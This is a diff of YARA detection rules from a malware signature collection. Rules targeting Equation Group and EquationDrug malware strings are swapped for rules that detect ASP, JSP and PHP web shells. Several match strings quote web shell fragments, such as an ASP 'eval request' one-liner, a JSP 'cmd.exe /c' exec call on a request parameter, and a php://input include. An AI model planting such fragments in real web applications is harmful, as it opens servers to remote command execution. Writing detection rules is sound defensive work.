+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L829-L843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1f0ae54ac3f10d533013f74f48849de4e65817a7"
-		logic_hash = "57e938ba1e53eeb99491547f53086eae3fc4d50bc5612e1b5ae6da6b029ac49e"
-		score = 80
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+		logic_hash = "c2eddf58b25caff79460ab9a87ac0573d483866a87c1b1ec0984afce2c22b29f"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "x:\\fanny.bmp" fullword ascii
-		$s2 = "32.exe" fullword ascii
-		$s3 = "d:\\fanny.bmp" fullword ascii
-		$x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
-		$x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
-		$x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
-		$x4 = "\\system32\\win32k.sys" wide
-		$x5 = "\\AGENTCPD.DLL" ascii
-		$x6 = "agentcpd.dll" fullword ascii
-		$x7 = "PADupdate.exe" fullword ascii
-		$x8 = "dll_installer.dll" fullword ascii
-		$x9 = "\\restore\\" ascii
-		$x10 = "Q:\\__?__.lnk" fullword ascii
-		$x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
-		$x12 = "\\shelldoc.dll" ascii
-		$x13 = "file size = %d bytes" fullword ascii
-		$x14 = "\\MSAgent" ascii
-		$x15 = "Global\\RPCMutex" fullword ascii
-		$x16 = "Global\\DirectMarketing" fullword ascii
+		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and filesize < 300000 and ( ( 2 of ( $s* ) ) or ( 1 of ( $s* ) and 6 of ( $x* ) ) or ( 14 of ( $x* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_HDD_Reprogramming_Module : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ntdaddy
 {
 	meta:
-		description = "Equation Group Malware - HDD reprogramming module"
+		description = "Web Shell - file ntdaddy.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "09ffe270-39e7-5225-b4a9-1c8d312a09c1"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L279-L297"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L844-L858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
-		logic_hash = "65800e5f122dce1dd4473bc8cebce0f9258b38d570118b154dbaf6939b68f925"
-		score = 75
+		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+		logic_hash = "7237eb7233c6affcc1f67a764f704b7d7e1d13f71c64893286c6c99318cc7c3e"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "nls_933w.dll" fullword ascii
-		$s1 = "BINARY" fullword wide
-		$s2 = "KfAcquireSpinLock" fullword ascii
-		$s3 = "HAL.dll" fullword ascii
-		$s4 = "READ_REGISTER_UCHAR" fullword ascii
+		$s9 = "if  FP  =  \"RefreshFolder\"  or  "
+		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300000 and all of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_EOP_Package : FILE
+rule SIGNATURE_BASE_Webshell_Mysql_Web_Interface_Version_0_8
 {
 	meta:
-		description = "Equation Group Malware - EoP package and malware launcher"
+		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2eb97873-a415-57be-a8fb-70ef86a99c9b"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L299-L318"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L859-L872"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
-		logic_hash = "abbc562b8e822422ae1852a5675a680e797a6af0be5581a8482785bd0c1ad1bf"
-		score = 75
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+		logic_hash = "680d4368804ad21e46dbe400563beca3ef724711b5432dccce1276ecadc04f2c"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "abababababab" fullword ascii
-		$s1 = "abcdefghijklmnopq" fullword ascii
-		$s2 = "@STATIC" fullword wide
-		$s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
-		$s4 = "@prkMtx" fullword wide
-		$s5 = "prkMtx" fullword wide
-		$s6 = "cnFormVoidFBC" fullword wide
+		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100000 and all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_Loader : FILE
+rule SIGNATURE_BASE_Webshell_Elmaliseker_2
 {
 	meta:
-		description = "Equation Group Malware - TripleFantasy Loader"
+		description = "Web Shell - file elmaliseker.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "562e7855-f011-5985-91c0-622b2fec32f8"
-		date = "2015-02-16"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L320-L342"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L873-L887"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
-		logic_hash = "f49735a587085e95f1a8e405e42e5ff3eb4beda1f26c7b4c3c0a33bec21f48c7"
-		score = 75
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+		logic_hash = "ca300cd142b3c8b820d3b5f5a56eeb834d9acb1d85916b932bd67fb4a25f4ed0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Original Innovations, LLC" fullword wide
-		$x2 = "Moniter Resource Protocol" fullword wide
-		$x3 = "ahlhcib.dll" fullword wide
-		$s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
-		$s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
-		$s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
-		$s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
-		$s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
-		$s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50000 and ( all of ( $x* ) and all of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Suspiciousstring : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Remexp
 {
 	meta:
-		description = "Equation Group Malware - suspicious string found in sample"
+		description = "Web Shell - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a5f203a7-0c50-5658-89f4-44533ed4eef0"
-		date = "2015-02-17"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L346-L364"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L888-L902"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd7f72c2263a3af9b8c9072b415a3b066e821e000b52ddd684ecb6b80a99067a"
-		score = 60
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+		logic_hash = "7a3b35c4a16f26167180cea81f67de101edabb9b35479f7e5acae7f3fe07f304"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "i386\\DesertWinterDriver.pdb" fullword
-		$s2 = "Performing UR-specific post-install..."
-		$s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
-		$s4 = "STRAITSHOOTER30.exe"
-		$s5 = "standalonegrok_2.1.1.1"
-		$s6 = "c:\\users\\rmgree5\\"
+		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer1
+rule SIGNATURE_BASE_Webshell_Jsp_List1
 {
 	meta:
-		description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+		description = "Web Shell - file list1.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21a500e7-3011-50e6-b685-f4f65d6dee17"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L368-L388"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L903-L917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
-		logic_hash = "ec90cba3b790c52f475a08b586f5af5a88ec46cfcf8abd74435981a34dfdb3f7"
-		score = 75
-		quality = 35
+		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+		logic_hash = "61ecafe477d98c5eb6887a9ff50960fc28b84512d09a36c02588159b08b395a4"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s3 = "sys\\mstcp32.dbg" fullword ascii
-		$s7 = "mstcp32.sys" fullword wide
-		$s8 = "p32.sys" fullword ascii
-		$s9 = "\\Device\\%ws_%ws" wide
-		$s10 = "\\DosDevices\\%ws" wide
-		$s11 = "\\Device\\%ws" wide
+		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Compatlayer_Unilaydll : FILE
+rule SIGNATURE_BASE_Webshell_Phpkit_1_0_Odd
 {
 	meta:
-		description = "EquationDrug - Unilay.DLL"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "32fd31c7-cc44-50e1-8888-b9da59ce587b"
-		date = "2015-03-11"
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L390-L402"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L918-L933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
-		logic_hash = "86434bd0456ea0c9ac9ed74dc3cf63520eb6b880dd4ea7920d0e82873dfec21e"
-		score = 75
+		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+		logic_hash = "bf99d6a71b9ef72574d928a09f3a479f2f819287d78c9a5435e45752e76a59bf"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "unilay.dll" fullword ascii
+		$s0 = "include('php://input');" fullword
+		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0
+		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer2
+rule SIGNATURE_BASE_Webshell_Jsp_123
 {
 	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "afc5ae23-4965-5796-af3b-9e2705aea455"
-		date = "2015-03-11"
+		description = "Web Shell - file 123.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L419-L438"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L934-L949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
-		logic_hash = "d29744a801194e5488795a8167965b94290be477efe478ee3e71c4bc98733967"
-		score = 75
-		quality = 35
+		hash = "c691f53e849676cac68a38d692467641"
+		logic_hash = "48925d3a302bf09ecb3f031301ca8afc722c7ef53b87efa27a3c4b58ee15217d"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "sys\\tdip.dbg" fullword ascii
-		$s4 = "dip.sys" fullword ascii
-		$s5 = "\\Device\\%ws_%ws" wide
-		$s6 = "\\DosDevices\\%ws" wide
-		$s7 = "\\Device\\%ws" wide
+		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer3
+rule SIGNATURE_BASE_Webshell_Asp_1
 {
 	meta:
-		description = "EquationDrug - Network Sniffer - tdip.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "c6b1658b-cbc6-535a-a3a2-15ce3cf6e4f6"
-		date = "2015-03-11"
+		description = "Web Shell - file 1.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L440-L455"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L950-L964"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14599516381a9646cd978cf962c4f92386371040"
-		logic_hash = "18c516fe0cd74e7a02ee15260abf3d27bba992492e6042a148abdee3086a9a00"
-		score = 75
+		hash = "8991148adf5de3b8322ec5d78cb01bdb"
+		logic_hash = "9cae40c8fc3966942a8fc3ee0f5d07081ba2d1c1c3156144488ba64015d6838b"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Corporation. All rights reserved." fullword wide
-		$s1 = "IP Transport Driver" fullword wide
-		$s2 = "tdip.sys" fullword wide
-		$s3 = "tdip.pdb" fullword ascii
+		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
+		$s8 = "<%eval request(\"pass\")%>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Volrec_Driver
+rule SIGNATURE_BASE_Webshell_ASP_Tool
 {
 	meta:
-		description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "db4f3f65-bdc4-565d-ad59-25a16ec7c9d2"
-		date = "2015-03-11"
+		description = "Web Shell - file tool.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L457-L471"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L965-L980"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
-		logic_hash = "24b8202a8590ddb1dd76e01499d02282ad40a6fd6f6b9020040381a370e91f40"
-		score = 75
+		hash = "4ab68d38527d5834e9c1ff64407b34fb"
+		logic_hash = "62ba39bac09cb403a47678cd38c519642cc3c20f43c470b828ec448c42e9bb73"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "msrstd.sys" fullword wide
-		$s1 = "msrstd.pdb" fullword ascii
-		$s2 = "msrstd driver" fullword wide
+		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
+		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Kernelrootkit
+rule SIGNATURE_BASE_Webshell_Cmd_Win32
 {
 	meta:
-		description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+		description = "Web Shell - file cmd_win32.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92491e30-4041-5c8b-8e4e-7bc2b1d3234b"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L473-L493"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L981-L995"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
-		logic_hash = "4b41af8656ada1b4db7ec11f65aeb2d335f424d8557cfa74a064b40c65627012"
-		score = 75
-		quality = 60
+		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+		logic_hash = "b90ba15b7b2c557f7b2303695b7f1f737f63df06d712c89e0cfea51c7d37e21d"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "Parmsndsrv.dbg" fullword ascii
-		$s2 = "\\Registry\\User\\CurrentUser\\" wide
-		$s3 = "msndsrv.sys" fullword wide
-		$s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" wide
-		$s6 = "\\Device\\%ws_%ws" wide
-		$s7 = "\\DosDevices\\%ws" wide
-		$s9 = "\\Device\\%ws" wide
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Keylogger
+rule SIGNATURE_BASE_Webshell_Jsp_Jshell
 {
 	meta:
-		description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "57b6af34-577b-58ec-9a9e-91911c32270b"
-		date = "2015-03-11"
+		description = "Web Shell - file jshell.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L495-L510"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L996-L1013"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
-		logic_hash = "b5db0e6e24979b07cd180fed11545daef281e7b0858a7de001a83c2cbc186557"
-		score = 75
+		hash = "124b22f38aaaf064cef14711b2602c06"
+		logic_hash = "dfe3ac097de4ca406ab7ec967fdc03d1e87c74f84fc675b58438a842d80cccda"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
-		$s3 = "\\DosDevices\\Gk" wide
-		$s5 = "\\Device\\Gk0" wide
+		$s0 = "kXpeW[\"" fullword
+		$s4 = "[7b:g0W@W<" fullword
+		$s5 = "b:gHr,g<" fullword
+		$s8 = "RhV0W@W<" fullword
+		$s9 = "S_MR(u7b" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Platformorchestrator
+rule SIGNATURE_BASE_Webshell_ASP_Zehir4
 {
 	meta:
-		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "ce19ed3c-9dd9-5cb0-99fe-c04fde057293"
-		date = "2015-03-11"
+		description = "Web Shell - file zehir4.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L538-L555"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1014-L1027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
-		logic_hash = "26c3b84a00702f155daa50c8f17e5f37e1aac46adde8a06a711e732a4cd806e9"
-		score = 75
+		hash = "7f4e12e159360743ec016273c3b9108c"
+		logic_hash = "aa3e07ee6369dd5f86f28a53c8e45391de718d4935021339a7b47829b5196f54"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SERVICES.EXE" fullword wide
-		$s1 = "\\command.com" wide
-		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s3 = "LSASS.EXE" fullword wide
-		$s4 = "Windows Configuration Services" fullword wide
-		$s8 = "unilay.dll" fullword ascii
+		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Equationdrug_Networksniffer5
+rule SIGNATURE_BASE_Webshell_Wsb_Idc
 {
 	meta:
-		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+		description = "Web Shell - file idc.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9eac2c51-3ad7-5346-a985-39733bc204c2"
-		date = "2015-03-11"
-		modified = "2023-01-06"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L557-L575"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1028-L1042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
-		logic_hash = "84f009e2ef639e5270273a7d9dd2542fdf1386c4c8363071d711e2333a112cd1"
-		score = 75
-		quality = 60
+		hash = "7c5b1b30196c51f1accbffb80296395f"
+		logic_hash = "f274061f1a02ab65bc574a6586343f74262a463c5200cd2c231a752f54967404"
+		score = 70
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "atmdkdrv.sys" fullword wide
-		$s4 = "\\Device\\%ws_%ws" wide
-		$s5 = "\\DosDevices\\%ws" wide
